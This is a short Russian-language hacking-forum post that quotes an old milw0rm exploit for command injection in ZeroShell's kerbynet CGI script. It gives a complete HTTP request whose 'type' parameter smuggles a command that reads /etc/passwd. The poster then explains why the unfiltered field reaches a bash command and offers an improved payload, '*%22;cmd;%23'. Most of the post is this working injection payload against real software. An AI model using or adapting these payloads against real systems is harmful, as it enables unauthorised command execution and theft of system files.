25.03.2016, 14:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от Bezlishke
Bezlishke said:
↑
Код:
Code:
====================================================
ZeroShell ;%22
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:
# milw0rm.com [2009-02-09]
Заинтересовало, но не могу одуплить. староватая конечно бага)
поле type участвует судя по всему в какой то баш команде, то есть
$ blablabla "blabla $type"
из за плохой фильтрации можно сделать инъекцию вида ";наша команда
%22 это как раз знак "
пайлоад у них правда странный *%22;;%22
имхо лучше так *%22;cmd;%23
|
|
|
|